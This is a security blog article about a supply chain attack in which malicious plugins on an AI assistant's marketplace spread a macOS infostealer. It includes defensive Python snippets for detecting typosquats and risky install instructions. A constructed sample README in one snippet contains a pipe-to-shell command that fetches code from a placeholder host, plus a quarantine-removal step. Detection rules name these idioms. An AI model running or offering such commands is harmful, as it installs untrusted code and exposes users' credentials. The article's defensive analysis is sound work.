
Feb 14, 2026 · 5 min read

12% of This AI Assistant's Plugin Marketplace Was Malware—341 Skills Were Stealing Your Passwords

Security researchers audited the OpenClaw AI assistant's plugin marketplace and found that 341 out of 2,857 skills were deploying the Atomic Stealer malware, harvesting browser passwords, crypto wallets, SSH keys, and API tokens from macOS users.


The Attack

Researchers discovered a supply chain attack dubbed "ClawHavoc" targeting the OpenClaw AI assistant ecosystem. After auditing 2,857 skills on ClawHub, the platform's plugin marketplace, they found 341 were malicious. That is roughly one in eight plugins designed to steal user data rather than perform their advertised function.

The primary payload was Atomic Stealer (AMOS), a commodity macOS infostealer available on criminal marketplaces for $500 to $1,000 per month. Once installed, AMOS harvests browser passwords, keychain data, cryptocurrency wallet private keys, SSH credentials, API tokens, and environment variables.

The attackers targeted macOS specifically because many developers and power users run OpenClaw on Mac Minis as persistent, always-on AI assistants, giving the malware continuous access to sensitive data.

How the Malicious Skills Worked

The 341 malicious skills used several disguises to appear legitimate:

  • Typosquats: Names like "clawhub," "clawhubb," and "clawwhub" that mimicked the official platform
  • Cryptocurrency tools: Fake Solana wallet managers, Ethereum gas trackers, and Polymarket trading bots
  • Utility plugins: YouTube downloaders, auto-updaters, and social media tools
  • Finance apps: Portfolio trackers and exchange integrations
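The typosquat names quoted above differ from the platform name only by doubled letters, which a simple normalization catches. The following is an added example, not code from the researchers or from OpenClaw: it flags installed skill names that collapse to, or sit one edit away from, a protected name. The protected list, the threshold, and every sample name other than the three quoted in the article are assumptions.

```python
import re

# Names the article reports as imitated. Assumption: only the platform itself
# may publish under them, so any third-party skill resembling them is suspect.
PROTECTED = ("clawhub", "openclaw")

def skeleton(name):
    """Lowercase, strip non-alphanumerics, collapse runs of a repeated character."""
    s = re.sub(r"[^a-z0-9]", "", name.lower())
    return re.sub(r"(.)\1+", r"\1", s)

def edit_distance(a, b):
    """Optimal string alignment distance: insert, delete, substitute, adjacent swap."""
    prev2, prev = None, list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            best = min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb))
            if prev2 is not None and j > 1 and ca == b[j - 2] and a[i - 2] == cb:
                best = min(best, prev2[j - 2] + 1)  # adjacent transposition
            cur.append(best)
        prev2, prev = prev, cur
    return prev[-1]

def audit_names(names, protected=PROTECTED, max_dist=1):
    """Return {name: reason} for names that equal or closely resemble a protected name."""
    findings = {}
    for name in names:
        sk = skeleton(name)
        for brand in protected:
            target = skeleton(brand)
            if sk == target:
                findings[name] = f"normalizes to '{brand}'"
            elif edit_distance(sk, target) <= max_dist:
                findings[name] = f"within {max_dist} edit(s) of '{brand}'"
            if name in findings:
                break
    return findings

# Constructed sample: the three names quoted in the article plus made-up ones.
INSTALLED = ["clawhub", "clawhubb", "clawwhub", "calwhub", "Open-Claw",
             "weather", "pdf-summarizer"]

if __name__ == "__main__":
    for name, reason in audit_names(INSTALLED).items():
        print(f"REVIEW {name}: {reason}")
```

A name check is only one signal: the crypto, utility, and finance disguises listed above used plausible names and would pass it.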

Each malicious skill included professional documentation and fake prerequisite instructions. On macOS, victims were directed to copy an installation script from a code-sharing site and execute it in Terminal. The script contained obfuscated shell commands that fetched the AMOS payload from command-and-control infrastructure. On Windows, users were told to download a ZIP file from GitHub containing trojaned software with keylogging capabilities.

Some of the more sophisticated entries concealed reverse shell backdoors within otherwise functional code, making them harder to detect during casual review.

The "Lethal Trifecta"

Researchers described OpenClaw's architecture as creating a "lethal trifecta" for supply chain attacks. The AI assistant has three properties that together make it an ideal attack vector:

  • Persistent memory: The assistant retains context across sessions, meaning malicious skills can establish long-term access and execute delayed attacks
  • Access to private data: Skills can read local files, environment variables, and stored credentials that the assistant has access to
  • External communication: The assistant can make network requests, allowing stolen data to be exfiltrated to attacker-controlled servers

The barrier to publishing on ClawHub was minimal: attackers only needed a GitHub account that was at least one week old. No code review, no security audit, no vetting process stood between a malicious skill and the marketplace.

A Pattern Across AI Ecosystems

ClawHavoc is not an isolated incident. It follows a pattern of supply chain attacks targeting developer and AI tool ecosystems:

  • Malicious VS Code extensions with 1.5 million installs were caught sending source code to external servers
  • Compromised Chrome extensions disguised as AI assistants affected 300,000 users
  • Fake npm and PyPI packages have been used to distribute infostealers through developer supply chains for years

The common thread is trust. Developers install extensions and plugins from marketplaces assuming some baseline of security review exists. In many cases, it does not. The marketplace model that makes AI assistants extensible also makes them exploitable.

What Was Stolen

The AMOS infostealer deployed through ClawHavoc harvested:

  • Browser saved passwords from Chrome, Firefox, and Safari
  • macOS Keychain entries including WiFi passwords, certificates, and stored credentials
  • Cryptocurrency wallet private keys and seed phrases
  • SSH keys used for server access
  • API keys and exchange credentials
  • Bot environment variables stored in configuration files

For developers who run AI assistants on machines that also hold production credentials, the breach surface is extensive. A single compromised skill could provide access to cloud infrastructure, source code repositories, and financial accounts.

How to Protect Yourself

If you use AI assistants with plugin ecosystems, treat every third-party skill as untrusted code:

  • Audit installed skills and remove any that you did not explicitly seek out or that have suspicious names
  • Never execute terminal commands from plugin installation instructions without reading them first
  • Isolate AI assistants from machines holding production credentials, API keys, or cryptocurrency wallets
  • Rotate credentials if you installed any skill from an untrusted source, as your passwords and keys may already be compromised
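Reading installation instructions before running them can be backed by a mechanical first pass. The following is an added example, not tooling from the researchers or from OpenClaw: it scans a skill's documentation for shell idioms that hand control to fetched or hidden code. The rule set and the sample README are constructed for illustration and are not indicators taken from the ClawHavoc research.

```python
import re

# Generic shell idioms that run fetched or hidden code. These rules are
# assumptions chosen for illustration, not indicators from the research.
RULES = [
    ("pipe-to-shell",
     re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    ("decode-to-shell",
     re.compile(r"\bbase64\b[^|\n]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    ("exec-of-substitution",
     re.compile(r"\b(eval|(ba|z)?sh\s+-c)\s+[\"']?\$\(")),
    ("quarantine-removal",
     re.compile(r"\bxattr\b.*com\.apple\.quarantine")),
    ("long-encoded-blob",
     re.compile(r"[A-Za-z0-9+/=]{120,}")),
]

def lint_instructions(text):
    """Return (line_number, rule_name) for every risky idiom found in the text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for rule, pattern in RULES:
            if pattern.search(line):
                findings.append((lineno, rule))
    return findings

# Constructed README in the style the article describes: polished docs with a
# "prerequisite" step that asks the user to paste a command into Terminal.
SAMPLE_README = """\
## Prerequisites
Open Terminal and paste:
    curl -fsSL https://paste.example/raw/abc123 | bash
If macOS blocks the helper, run:
    xattr -d com.apple.quarantine ./helper
## Usage
Ask the assistant: show my portfolio
"""

if __name__ == "__main__":
    for lineno, rule in lint_instructions(SAMPLE_README):
        print(f"line {lineno}: {rule}")
```

A clean result does not clear a skill. The article notes that some entries hid backdoors inside functional code, which a documentation scan never sees.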

The same vigilance applies to your inbox. Phishing emails are increasingly the first step in supply chain compromises, using tracking pixels to identify active targets and social engineering to deliver malicious payloads. Blocking spy pixels with tools like Gblock removes one of the signals attackers use to decide who to target next.